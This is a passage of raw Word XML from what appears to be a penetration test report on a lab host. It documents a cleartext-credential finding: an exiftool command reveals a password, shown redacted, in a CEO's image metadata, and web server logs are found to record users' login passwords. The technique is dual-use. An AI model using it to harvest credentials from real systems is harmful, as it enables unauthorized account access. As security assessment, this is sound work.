          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="15"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B84AD2" w14:textId="079724C9" w:rsidR="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-200: Exposure of Sensitive Information to an Unauthorized Actor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78438B" w14:textId="6A4E2BCA" w:rsidR="00D36E2B" w:rsidRPr="001330E3" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/200.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173046BD" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRDefault="00455A9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42666709" w14:textId="7E30C925" w:rsidR="00BA5F4C" w:rsidRPr="001215EC" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Insufficient_Authentication_Control"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Information Disclosure – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Credentials Stored in Cleartext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8BA034" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRPr="006F5E52" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">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BA5F4C" w:rsidRPr="005264D0" w14:paraId="7EC5F1F1"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208DE63A" w14:textId="52632F24" w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w:rsidRDefault="00D36E2B" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D36E2B">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Information Disclosure – Credentials Stored in Cleartext</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w14:paraId="238BBFD3"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0ADFB792" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRPr="00DA733E" w:rsidRDefault="00BA5F4C"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439209D2" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w:rsidRDefault="00BA5F4C" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFAFAF"/>
          </w:tcPr>
          <w:p w14:paraId="548F9674" w14:textId="3FBB6CC2" w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w:rsidRDefault="00BA5F4C" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w14:paraId="271CC066"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434AD9C5" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w:rsidRDefault="00BA5F4C" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2991256C" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w:rsidRDefault="00BA5F4C" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40556552" w14:textId="4CEB0BE6" w:rsidR="00BA5F4C" w:rsidRPr="005264D0" w:rsidRDefault="00BA5F4C" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA5F4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BA5F4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BA5F4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="150DD915" w14:textId="342BBC83" w:rsidR="00BA5F4C" w:rsidRPr="00DA733E" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>When applications store cleartext credentials in application source code or configuration files, it creates a vulnerability. Insecurely stored credentials can allow attackers to bypass authentication mechanisms to access functionality that should be password protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4DADCE" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1DB563" w14:textId="184F34E3" w:rsidR="00BA5F4C" w:rsidRPr="003C17E2" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t>/data/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5F4C">
        <w:t>CEO_gibson.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721193FF" w14:textId="01D81C12" w:rsidR="00BA5F4C" w:rsidRPr="003C17E2" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27678783" w14:textId="27E7DB9B" w:rsidR="00BA5F4C" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00884BFC" w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/var/log/apache2/access.log</w:t>
      </w:r>
      <w:r w:rsidR="00884BFC" w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08791007" w14:textId="77777777" w:rsidR="008C4490" w:rsidRPr="003C17E2" w:rsidRDefault="008C4490" w:rsidP="008C4490">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2768921E" w14:textId="6A95E553" w:rsidR="008C4490" w:rsidRDefault="008C4490" w:rsidP="008C4490">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/var/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04FD52C5" w14:textId="509110FC" w:rsidR="008C4490" w:rsidRPr="00884BFC" w:rsidRDefault="008C4490" w:rsidP="008C4490">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/var/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>www/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49C67964" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2BD222" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRDefault="00BA5F4C" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A003BAD" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://10.10.0.66/data/CEO_gibson.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A487D6B" w14:textId="0E186C88" w:rsidR="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
      <w:r>
        <w:t xml:space="preserve">The application </w:t>
      </w:r>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/data/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory contains an image file with the CEO’s profile picture, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A933B" w14:textId="196408C9" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DB1D2C6" wp14:editId="635DFE69">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1543050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1383665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2305050" cy="228600"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="2096931872" name="Rectangle 10"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2305050" cy="2286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5DC31" id="Rectangle 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:121.5pt;margin-top:108.95pt;width:181.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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00884BFC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="726473ED" wp14:editId="44E120E3">
            <wp:extent cx="2898585" cy="3114675"/>
            <wp:effectExtent l="19050" t="19050" r="16510" b="9525"/>
            <wp:docPr id="9257217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1709" name="Picture 1" descr="Text&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2900509" cy="3116743"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F3C709" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRDefault="00884BFC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52295644" w14:textId="028874C1" w:rsidR="00BA5F4C" w:rsidRDefault="00884BFC" w:rsidP="00BA5F4C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Analysis of the image file using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, shown in the below image,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> revealed a password stored in the image metadata.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA5F4C" w14:paraId="546BEEC8" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1662A9C1" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>exiftool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> CEO_gibson.jpg                       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62171466" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>ExifTool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> Version Number       </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> 12.57</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A766B3E" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">File Name                     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> CEO_gibson.jpg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFCE95D" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50916555" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Title                         </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> profile picture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74E951D5" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Description                   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> profile picture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F53E0F" w14:textId="77777777" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Warning                       </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> [minor] Fixed incorrect URI for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>xmlns:MicrosoftPhoto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1C5A8BA9" w14:textId="306BAA0E" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Flash Model                   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00884BFC">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> passwd:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B0D9DCE" w14:textId="58AC8D70" w:rsidR="00BA5F4C" w:rsidRPr="004E111C" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BB44DBD" w14:textId="37BC5A2E" w:rsidR="00BA5F4C" w:rsidRDefault="00884BFC" w:rsidP="00BA5F4C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Metadata</w:t>
      </w:r>
      <w:r w:rsidR="00BA5F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F098F" w14:textId="1D373517" w:rsidR="00BA5F4C" w:rsidRDefault="00884BFC" w:rsidP="00BA5F4C">
      <w:r>
        <w:t xml:space="preserve">The stored credential allowed the assessment team to access both the web application account and the server user account for the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B750E4D" w14:textId="14F98D1B" w:rsidR="00884BFC" w:rsidRPr="00884BFC" w:rsidRDefault="00884BFC" w:rsidP="00884BFC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/log/apache2/access.log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E30001" w14:textId="0BC56755" w:rsidR="008C4490" w:rsidRDefault="00884BFC" w:rsidP="008C4490">
      <w:r>
        <w:t xml:space="preserve">The assessment team discovered that the web server logs included usernames and passwords users entered when they attempted to log into the application. </w:t>
      </w:r>
      <w:r w:rsidR="008C4490">
        <w:t>A sample of the log file contents are included in the figure below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
